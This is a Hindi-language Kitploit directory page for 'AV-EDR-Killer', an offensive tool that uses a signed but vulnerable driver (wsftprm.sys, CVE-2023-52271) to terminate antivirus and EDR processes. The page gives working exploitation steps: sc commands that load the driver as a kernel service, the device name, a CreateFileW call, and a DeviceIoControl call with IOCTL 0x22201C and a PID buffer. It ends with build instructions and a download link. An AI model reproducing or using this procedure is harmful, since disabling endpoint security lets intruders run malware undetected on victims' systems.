Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
AV-EDR-Killer — AV/EDR प्रक्रियाओं की समाप्ति एक संवेदनशील ड्राइवर (BYOVD) का शोषण करके | Kitploit
उपकरण/GitHubGitHub/xm0kht4r/av-edr-killer
विशेषाधिकार वृद्धिस्थायित्व तंत्रशोषणआईडीएस/आईपीएस से बचनापार्श्व आंदोलनपोस्ट-शोषणकमांड एंड कंट्रोलरेड टीमिंग
GitHubxm0kht4r/av-edr-killer

AV-EDR-Killer

AV/EDR प्रक्रियाओं की समाप्ति एक संवेदनशील ड्राइवर (BYOVD) का शोषण करके

रिपॉजिटरी देखें
296467 महीने पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

AV/EDR किलर

https://github.com/user-attachments/assets/1eda3340-2af2-4136-b74e-be7a3f4b3924

यह प्रोजेक्ट दर्शाता है कि कैसे एक वैध और हस्ताक्षरित ड्राइवर को कर्नेल स्तर की पहुंच प्राप्त करने के लिए हथियार बनाया जा सकता है।

🚨 कमजोर ड्राइवर:

wsftprm.sys , TPZ SOLUCOES DIGITAIS LTDA द्वारा हस्ताक्षरित, और पहले सार्वजनिक रूप से CVE-2023-52271 के रूप में प्रकट स्थानीय विशेषाधिकार वृद्धि भेद्यता के संपर्क में था, लेकिन किसी तरह अभी भी Microsoft की ड्राइवर ब्लॉकलिस्ट पर नहीं है!! 🤫🤫

भेद्यता IOCTL कोड 0x22201C के माध्यम से 1036-बाइट बफर के साथ ट्रिगर की जाती है जहां पहले 4 बाइट्स में लक्ष्य प्रक्रिया ID को DWORD के रूप में होता है। कमजोर ड्राइवर, DeviceIoControl के माध्यम से इस दुर्भावनापूर्ण IOCTL को प्राप्त करने पर, आयातित ZwTerminateProcess फ़ंक्शन को लागू करता है, जो किसी भी उपयोगकर्ता-मोड एप्लिकेशन को कर्नेल-स्तरीय प्रक्रिया समाप्ति क्षमता प्रदान करता है।

कोई भी समझदार खतरा अभिनेता स्वाभाविक रूप से महत्वपूर्ण एंटीवायरस (AV) और एंडपॉइंट डिटेक्शन एंड रिस्पॉन्स (EDR) प्रक्रियाओं को समाप्त करने के लिए इस क्षमता को प्राथमिकता देगा।

⚡ शोषण:

1. एक सेवा पंजीकृत करें:

प्रशासक विशेषाधिकारों के साथ cmd.exe लॉन्च करें, और प्रकार "kernel" और binPath को कमजोर ड्राइवर के स्थान पर इंगित करते हुए एक कर्नेल ड्राइवर सेवा पंजीकृत करें।

root@kitploit:~
> sc create MalDriver binPath= <path> type= Kernel`
> sc start MalDriver

एक बार लोड होने के बाद, ड्राइवर उपयोगकर्ता-मोड के लिए \.\Warsaw_PM के रूप में सुलभ एक सिंबलिक लिंक बनाता है। जिसका उपयोग हम CreateFileW API कॉल का उपयोग करके ड्राइवर डिवाइस का हैंडल प्राप्त करने के लिए कर सकते हैं।

root@kitploit:~
> CreateFileW(device_name.as_ptr(), GENERIC_READ | GENERIC_WRITE, 0, ptr::null_mut(), OPEN_EXISTING, 0, ptr::null_mut())

दुर्भावनापूर्ण IOCTL भेजने के लिए हम कोड 0x22201C के साथ DeviceIoControl का उपयोग करेंगे, और बफर जिसमें इसके पहले 4 बाइट्स में एक PID हो।

root@kitploit:~
> DeviceIoControl(self.hDriver, 0x22201C, buffer.as_mut_ptr() as LPVOID, buffer.len() as u32, ptr::null_mut(), 0, &mut bytes_returned, ptr::null_mut())

2. लाभ

Cargo build --release बाइनरी उत्पन्न करने के लिए।

🛠️ अनुकूलन:

आप समाप्ति के लिए लक्ष्य सूची में अतिरिक्त प्रक्रियाएँ जोड़ सकते हैं।

🔒 अस्वीकरण

इस उपकरण का उपयोग करने से पहले आप यह सुनिश्चित करने के लिए जिम्मेदार हैं कि आपके पास उचित प्राधिकरण है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।

🤝 सहयोग

योगदान और सुझावों का स्वागत है! यदि आपके पास विचार, सुधार हैं, या सहयोग करना चाहते हैं, तो बेझिझक यहां संपर्क करें: [email protected]

टूल डाउनलोड करें